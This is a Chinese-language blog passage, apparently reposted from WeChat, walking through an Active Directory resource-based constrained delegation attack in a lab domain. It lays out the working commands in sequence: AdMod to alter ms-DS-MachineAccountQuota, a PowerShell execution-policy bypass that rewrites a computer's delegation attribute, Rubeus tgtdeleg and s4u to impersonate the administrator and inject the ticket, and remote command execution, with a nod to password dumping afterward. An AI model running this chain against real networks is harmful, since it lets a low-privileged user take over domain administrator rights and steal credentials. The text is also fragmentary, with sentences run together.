ms-DS-MachineAccountQuota可以通过ADSI编辑器更改:AdMod.exe -b "dc=rootkit,dc=org" "ms-DS-MachineAccountQuota::0" -updatenchead
ms-DS-MachineAccountQuota为0:msDS-AllowedToActOnBehalfOfOtherIdentity属性,而且还提到,服务账号,如iis、localservice这些,发起网络请求的身份是机器账号:msDS-AllowedToActOnBehalfOfOtherIdentity改为自身机器账号,然后自身机器账号在模拟用户进行委派攻击。powershell -ep bypass "import-module .\Microsoft.ActiveDirectory.Management.dll;$iis = get-adcomputer SRV-WEB-KIT;set-adcomputer SRV-WEB-KIT -PrincipalsAllowedToDelegateToAccount $iis"
这时候看过我前文(点击即可访问)的小伙伴会想了:“接下来我会,使用机器账号的凭证发起s4u协议就可以委派了”,确实是可以,但是这里是低权限用户,没法抓密码,也就无法获取机器账号凭证,那应该如何操作呢?
首先利用rubeus通过
AcquireCredentialsHandle、InitializeSecurityContext,以非高权限申请转发票据:
rubeus.exe tgtdeleg /nowrap
rubeus.exe s4u /user:SRV-WEB-KIT$ /domain:rootkit.org /dc:owa2013.rootkit.org /impersonateuser:administrator /msdsspn:http/SRV-WEB-KIT.rootkit.org /ptt /ticket:doIFLxxxxxxxxxx
powershell -ep bypass "invoke-command -computername SRV-WEB-KIT.rootkit.org -Command {whoami}"
抓密码啥的当然也不在话下:
实验推荐
文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652885360&idx=1&sn=acd066ce3fc73c288ccd258148083c86&chksm=bd59adbd8a2e24abad645106bc47ac5e74f25f43c95b2e453ea40aa599ab6986b022a8230e21#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh